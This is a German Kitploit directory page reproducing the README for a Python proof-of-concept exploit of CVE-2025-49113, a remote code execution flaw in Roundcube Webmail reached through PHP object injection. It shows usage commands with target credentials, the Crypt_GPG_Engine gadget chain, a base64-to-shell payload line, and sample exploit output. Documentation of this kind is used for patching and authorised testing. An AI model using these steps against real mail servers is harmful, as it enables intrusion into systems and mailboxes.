Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49113 — 💥 Python-Exploit für CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection | Kitploit
Tools/GitHubGitHub/00xcanelo/cve-2025-49113
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHub00xcanelo/cve-2025-49113

CVE-2025-49113

💥 Python-Exploit für CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection

Repository anzeigen
8611vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-49113 – Roundcube Webmail RCE Exploit (Python PoC)

CVE-ID: CVE-2025-49113
Exploit-Typ: Remote Code Execution (via PHP Object Injection)
Anwendung: Roundcube Webmail ≤ 1.5.9 und ≤ 1.6.10
Exploit-Sprache: Python
Autor: 00xCanelo
Status: Getestet und funktionsfähig auf verwundbaren Roundcube-Installationen


📌 Beschreibung

Dieser Exploit nutzt eine Schwachstelle in der Art und Weise aus, wie Roundcube Webmail hochgeladene Bilddateinamen behandelt, die als PHP-Objekte unserialisiert werden. Durch das Erstellen einer schädlichen Payload, die eine Crypt_GPG_Engine-Deserialisierungskette auslöst, kann eine Remote-Code-Ausführung nach der Authentifizierung erreicht werden.

Dieser Python-PoC imitiert die vom öffentlichen PHP-Exploit verwendete Angriffskette, jedoch mit saubererer Logik, optionaler Protokollierung und einfacher Handhabung in offensive Tooling-Setups.


🚧 Voraussetzungen

  • Verwundbare Roundcube-Version (≤1.5.9 oder ≤1.6.10)
  • Gültige Benutzeranmeldedaten für Roundcube
  • Python 3.x-Umgebung
  • pip install requests

🚀 Ausführungsschritte

root@kitploit:~
python3 CVE-2025-49113.py <target_url> <username> <password> <command>

Beispiel:

root@kitploit:~
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'

🔐 Verwundbare Kette

Die PHP-Klasse Crypt_GPG_Engine erlaubt das Setzen eines _gpgconf-Feldes, das dann an die Shell-Ausführung übergeben wird.

Unsere Payload erstellt:

root@kitploit:~
echo "<base64-encoded-cmd>" | base64 -d | sh

in _gpgconf, was bei der Deserialisierung zu RCE führt.


💣 Beispielausgabe

root@kitploit:~
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!

📁 Dateistruktur

root@kitploit:~
.
├── CVE-2025-49113.py     # Python PoC script
└── README.md             # This documentation

⚠️ Haftungsausschluss

Dieser Code dient ausschließlich zu Bildungszwecken und autorisierten Sicherheitstests. Jeglicher Missbrauch dieses Tools ist strengstens untersagt. Der Autor übernimmt keine Haftung für verursachte Schäden.


🧠 Verweise

  • https://nvd.nist.gov/vuln/detail/CVE-2025-49113
  • https://github.com/roundcube/roundcubemail/issues/9312
  • https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
Tool herunterladen